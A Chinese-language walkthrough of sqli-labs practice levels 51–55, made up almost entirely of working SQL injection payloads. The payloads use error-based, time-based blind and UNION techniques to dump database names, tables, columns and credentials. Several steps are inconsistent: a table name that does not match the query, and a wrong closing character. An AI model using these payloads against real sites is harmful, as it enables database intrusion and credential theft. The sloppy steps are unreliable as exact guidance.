第五一关 less-51
步骤一:利用报错注入查询库
?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+
步骤二:查询表名
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) --+
步骤三:查看user表中列名
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
步骤四:查询数据
?sort=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1) --+
第五二关 less-52
步骤一:利用时间盲注查询数据库
?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114
输入?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)
判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115
得出数据库长度为'security'
步骤二:查询表名
?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)
?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)
第一个表名为'email'
第五三关 less-53
步骤一:利用时间盲注查询数据库
?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1) --+
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114
输入?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+
判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115
得出数据库长度为'security'
步骤二:查询表名
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+
?sort=1'and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+
第一个表名为'email'
第五四关 less-54
步骤一:闭合方式?id=1' --+
步骤二:查询数据库
?id=-1' union select 1,2,database() --+
步骤三:联合查询 查出网站的数据库表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
t7rdtyr6cn
步骤四:联合查询 查出users表列名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='c32n7ncqap' --+
secret_I79E
步骤五:获取目标信息
?id=-1' union select 1,2,secret_I79E from t7rdtyr6cn --+
QeMKsxsGHJWqtpt6ZMXPtoPZ
输入登录框,提交成功
第五五关 less-55
步骤一:闭合方式?id=1) --+
步骤二:查询数据库
?id=-1) union select 1,2,database() --+
步骤三:联合查询 查出网站的数据库表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
qh55e2yvem
步骤四:联合查询 查出users表列名
?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='qh55e2yvem' --+
secret_CY1J
步骤五:获取目标信息
?id=-1) union select 1,2,secret_CY1J from qh55e2yvem --+
7hf9Kp0W2EFVDpUJvmhZVBsf
输入登录框,提交成功